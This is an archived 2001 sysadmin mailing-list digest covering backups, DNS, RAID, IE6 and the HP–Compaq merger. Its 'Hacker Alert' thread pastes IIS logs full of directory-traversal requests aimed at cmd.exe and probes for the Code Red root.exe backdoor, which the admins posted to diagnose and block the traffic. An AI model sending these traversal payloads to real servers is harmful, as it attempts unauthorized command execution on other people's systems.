W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á
RE: WARNING: Hacker Alert
I know that some of these attack attempts seem to be searching for the code red backdoors, for instance these lines: GET, /winnt/system32/cmd.exe, /c+dir, GET, /scripts/root.exe, /c+dir GET, /MSADC/root.exe, /c+dir, use the backdoor created by Code Red. At this point it seems more and more likely there is some kind of Code Red mutation that is causing this. The thing that frightens me is the timing in relation to the other terror attacks. Is this a prelude to a cyber-terror attack?? I am going to start locking my systems down( not that they werent already) just in case and I suggest everyone else do the same. xylog -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:59 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:50 AM To: NT System Admin Issues Cc: '[EMAIL PROTECTED]' Subject: RE: WARNING: Hacker Alert Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13
RE: WARNING: Hacker Alert
Title: RE: WARNING: Hacker Alert The best way to do this is with a Firewall Rule. This will prevent you webservers from getting overloaded by illicit traffic. xylog -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:40 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert How do you do that? -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:26 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert looks like an exploit of the Hacked by Chinese type from several months ago. None of my servers have shown attempts. One easy way to stop most of the IIS probing is to simply require host headers on all sites. If your server doesn't respond when the get/put commands use an IP number, then most vulnerabilities aren't vulnerable. Then any scans would need to be done via DNS rather than random IP numbers, significantly slowing attacks. -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:19 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert Here is a site that has been hit http://216.39.178.32 -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 7:59 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:50 AM To: NT System Admin Issues Cc: '[EMAIL PROTECTED]' Subject: RE: WARNING: Hacker Alert Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231
RE: Backup
Carbon Paper -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 2:10 PM To: NT System Admin Issues Subject: Re: Backup Is there anything better than ArcServ??? Bigll [EMAIL PROTECTED] on 09/12/2001 01:12:14 PM Please respond to NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] cc: Subject: Backup I'm looking for backup program, which would work with CDR as a device. I need to run daily backup for small office (100 Mg per day) 5 times a week. Tia, Bigll __ Do You Yahoo!? Get email alerts NEW webcam video instant messaging with Yahoo! Messenger http://im.yahoo.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: cannot ping by name
Are all the machines you can ping on the same subnet? If so they are doing broadcast resolution and other name resolution is not working. Also test DNS using both FQHN as well as host name so : ping host ping host.loc.org.com And also check WINS resolution there is a RK tool called winscl that can help in this regard. xylog -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 4:46 PM To: NT System Admin Issues Subject: RE: cannot ping by name Can it be the routing issue? Is either the backup or the server in question a multihomed machine? Try putting entries in a HOST file on both machines and try pinging again. This way, you will eliminate the name resolution issue and will be able to concentrate on a network issue When you ping by name, which error do you get: - unknown host.. - destination host is not reachable - request timed out? Andrey Mal Sasalu [EMAIL PROTECTED] on 09/10/2001 04:19:30 PM Please respond to NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] cc: (bcc: Andrey Kalinin/FIS) Subject: RE: cannot ping by name No, we do not have any manual mapping of machines IP address in either host file or lmhost file. When I ping any machine by name from this server they get resoloved except for few servers. Unfortunately one of them being the backup server. So I am not able to do the backup for last 2 days. I just now tried ipconfig /flushdns without any luck. Mal -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 2:13 PM To: NT System Admin Issues Subject: Re: cannot ping by name can it be that you have a HOST file with incorrect IP-host mapping on a machine from which you cannot ping? When you ping by name, does it resolve the name correctly? Does it resolve the name at all? Andrey Kalinin Please respond to NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] cc: (bcc: Andrey Kalinin/FIS) Subject: cannot ping by name Hi guys, From one particular server, I cannot ping some servers by name. I can ping the same servers by IP address or I can do nslookup. I am sure it is not name servers issue because all other machines can ping any machine by name or IP address on the network. I also checked the DNS entry on that particular server, everything looks right. Any thought on this? You can be sarcastic!! I don't mind. By the way, this is the only 2000 server on an NT network, if that makes any difference!. Mal http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Application software to monitor network traffic
Title: RE: Application software to monitor network traffic There is a freeware packet sniffer that is fully featured and has some features that netmon does not such as breaking down traffic by many different protocols. Check it out: http://www.ethereal.com xylog -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 11:46 AM To: NT System Admin Issues Subject: RE: Application software to monitor network traffic MRTG wil only graph the traffic for you. Also it requires snmp and you have to 'point it' at the device you want to monitor. -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: 07 September 2001 16:38 To: NT System Admin Issues Subject: RE: Application software to monitor network traffic MRTG See the following: http://www.ultratech-llc.com/KB/?File=NetMon.TXT - ASB -Original Message- From: Sui Seto [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 10:34 AM To: NT System Admin Issues Subject: Application software to monitor network traffic Hi everyone, I am looking for a software that will monitor the network traffic on our LAN/WAN . Sometimes I find the network is very sluggish and at other times, it is normal, I want to pin down the problem. I also expect the software to be able to identify which workstation is transferring big files, such a ppt file etc. Thanks for your info. Sui Seto http://www.sunbelt-software.com/ntsysadmin_list_charter.htm This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify us immediately at [EMAIL PROTECTED] and delete this E-mail from your system. Thank you. It is possible for data transmitted by email to be deliberately or accidentally corrupted or intercepted. For this reason, where the communication is by email, the Bank of Ireland Group does not accept any responsibility for any breach of confidence which may arise through the use of this medium. This footnote also confirms that this email message has been swept for the presence of known computer viruses. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Windows 2000 ERD
Title: RE: Windows 2000 ERD Well all this does is backup the registry hives, so alls you need is regback from the Resource kit that can be run for each hive: regback c:\regback\system machine system regback c:\regback\software machine software regback c:\regback\sam machine sam regback c:\regback\security machine security Now zip them up and store them online for regular tape backup. xylog -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 12:40 AM To: NT System Admin Issues Subject: RE: Windows 2000 ERD That is why I still miss rdisk /s- anyone know of a nice cheap (read free) equiv under 2000 that can be scripted? -Original Message- From: Jim Underwood [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 21:34 To: NT System Admin Issues Subject: RE: Windows 2000 ERD Be careful, this code is buggy. If you don't insert a floppy in time, it goes haywire. Even if you insert the floppy, if it takes longer than the code expects, it goes haywire. The code relies on SendKeys and assumed delays to perform a given operation. Almost always a risky approach to use in general. Best Regards, JMU Jim Underwood Apollo Information Systems, Inc. Houston, TX 77058 EMail: [EMAIL PROTECTED] -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 10:08 PM To: NT System Admin Issues Subject: RE: Windows 2000 ERD http://www.windows2000faq.com/Articles/Index.cfm?ArticleID=16150 One of the things I really miss from NT 4.0 is rdisk /s- but the above link has a script you can use to do the same thing http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: HP to Acquire Compaq in $25B Deal
Title: Message OK I got some mis-information and I blame yahoo news which posted the story Hewlett-Packard to Buy Compaq in $25B Deal However I since HP has majority controlling interest in the merger I stick by my assertion that there will be changes as redundant functions are eliminated. xylog -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:10 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal It's really a merger. The merged company will operate out of Palo Alto, CA. Many Compaq executives will be retained, such as the Compaq CEO, who will become president of the merged company. William -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 10:03 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Except its not a merger. HP purchsed compaq. HP's management now controls the Compaq's destiny. What this means is that HP will, in order to cut costs, eliminate all possible redundant functions.I agree it is a good merger, but it is very naïve to expect nothing to change. xylog -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:48 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal I don't think there will be duplicate positions. I expect them to continue to function as 2 seperate companies. Compaq's name is much bigger than HP, especially in the server market. I think HP just wanted a bigger piece of the PC and Server pie, and Compaq wanted the financial backing of HP's dominance in the peripheral and printer market. It's a good merger. -Original Message- From: Jim Underwood [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:32 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Interesting articles at www.infoworld.com: 1. HP, Compaq target enterprise, services markets in $25 billion acquisition 2. Merger highlights role of HP's Fiorina While the merger may not guarantee an improvement in sales/performance, does anyone see a downside to the merger (other than HP/Compaq employees who will lose their job when duplicate positions are eliminated)? Do you expect the merger to provide better products and services? Best Regards, JMU http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: HP to Acquire Compaq in $25B Deal
Title: Message I have been through several mergers of large/Fortune 100 corperations (Union Bank of Switzerland and Swiss Bank/Paine Webber and Kitter Peabody) and can speak from experience when I say that ther will be large cuts in the workforce of both companies to eliminate redundant functions. It is just common sense to cut costs by combining, wherever possible, duplicated functions. Where these cuts will occur is a matter of speculation, but you can be sure since HP has controlling interests they will generally get preferential treatment. xylog -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:25 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal It's not a merger? You'd better learn big business. It's a merger, and don't expect to see too many changes too quickly. Compaq was already making big time changes in it's product line before this even happened. HP was planning on getting out of the PC business anyways. A name change could happen, but who knows? I don't appreciate the naive comment anyhoo... You saying it's not a merger is naive... -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:03 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Except its not a merger. HP purchsed compaq. HP's management now controls the Compaq's destiny. What this means is that HP will, in order to cut costs, eliminate all possible redundant functions.I agree it is a good merger, but it is very naïve to expect nothing to change. xylog -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:48 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal I don't think there will be duplicate positions. I expect them to continue to function as 2 seperate companies. Compaq's name is much bigger than HP, especially in the server market. I think HP just wanted a bigger piece of the PC and Server pie, and Compaq wanted the financial backing of HP's dominance in the peripheral and printer market. It's a good merger. -Original Message- From: Jim Underwood [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:32 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Interesting articles at www.infoworld.com: 1. HP, Compaq target enterprise, services markets in $25 billion acquisition 2. Merger highlights role of HP's Fiorina While the merger may not guarantee an improvement in sales/performance, does anyone see a downside to the merger (other than HP/Compaq employees who will lose their job when duplicate positions are eliminated)? Do you expect the merger to provide better products and services? Best Regards, JMU http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Internet Explorer 6.0
No problems with PDF files in IE6. It only took me one day, however to discover I had an internal intranet app called Testdirector that needs plugin support and does not work no way, no how under IE6. xylog -Original Message- From: Streeter, Lerone A LBX [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:50 PM To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 i have IE 6 and no problems... i often view .pdf files, just opened one from compaq... no problems. perhaps i'm not viewing some of the same web pages others are... === Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] === -Original Message- From: CIGNA DTS [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:54 PM To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 I see several peopl have had no problems with IE 6.0. Amazing. Don't you run Adobe Acrobat Reader? Never need to read PDF files from web sites? http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: NT 4 PDC replacement
The PDC will not accept logons but your BDC's still can, so user can logon during this process. You cannot add user or computer accounts to the domain however. xylog - Original Message - From: Kent Spencer [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Thursday, August 30, 2001 5:25 PM Subject: Re: NT 4 PDC replacement .. while it's doing the promote no logons are allowed as it stops the netlogon process. Kent --- Blake R. Fowkes [EMAIL PROTECTED] wrote: Hi all, I am about to replace my old PDC and was wondering about when I promote the BDC to PDC. Would there be any problems with doing this while people are here or should I do this as an after hours project? Thanks, Blake Fowkes Waid and Associates http://www.sunbelt-software.com/ntsysadmin_list_charter.htm __ Do You Yahoo!? Get email alerts NEW webcam video instant messaging with Yahoo! Messenger http://im.yahoo.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: Hard drive configuration
If your on a really tight budget you can get good reliability with a Software mirrored SLED configuration (thats Single Large Expensive Disk) if you use two scsi controllers one for each disk. Other wise I agree with the general sentiment that software RAID is bad, very bad. xylog - Original Message - From: Andrew Baker [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Thursday, August 30, 2001 6:59 PM Subject: RE: Hard drive configuration Truly mission critical = Hardware SCSI RAID controller Not really mission critical = Hardware ATA RAID controller Plain broke and someone else's data = Software RAID on a Workstation class system. - ASB -Original Message- From: RE Young [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 2:04 PM To: NT System Admin Issues Subject: Re: Hard drive configuration If you truly have a mission critical application/data then push the hardware solution, on the other hand if you don't really need it... now I'm up to $.04.. RE Young MCSE Client Server System Engineering Dallas, TX - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 12:50 PM Subject: RE: Hard drive configuration That is very true and if I can't get the money to purchase a RAID controller, software is the way I'll have to go. Hopefully I will be able to convince them and/or I'll have to use one of my tricks for staying under the limit that requires approval. ;-) -Original Message- From: RE Young [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 10:38 AM To: NT System Admin Issues Subject: Re: Hard drive configuration I have used softrware raid in hundreds of NT servers for years w/o problems, it is there to use. if for example, there is no money in the buget for hardware raid controllers, the reality is money is an issue. My $.02.. RE Young MCSE - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 10:50 AM Subject: RE: Hard drive configuration That's too funny. I do at least know Hardware RAID is better than Software RAID. And if NT will allow me to duplex, as it was suggested by someone else, then that's probably what I'll do. -Original Message- From: Flanagan, Kevin [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 4:48 AM To: NT System Admin Issues Subject: RE: Hard drive configuration I second this, only ever use Hardware RAID, which RAID config depends on what you are doing. When interviewing folks for an open position at my last employer we had someone say that they thought that software RAID was slick, that was the last thing he said that I heard. Kevin +---+ Kevin Flanagan C/S Planning Engineer III I/T Implementation Department Branch Banking Trust Company 3261 Atlantic Avenue, Suite 116 MC: 172-85-01-00 Raleigh, NC 27604 Voice: 919-716-6209 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 7:34 PM To: NT System Admin Issues Subject: RE: Hard drive configuration Thanks for the info. I will see if I can do that. -Original Message- From: Zangara, Jim [mailto:[EMAIL PROTECTED]] Sent: 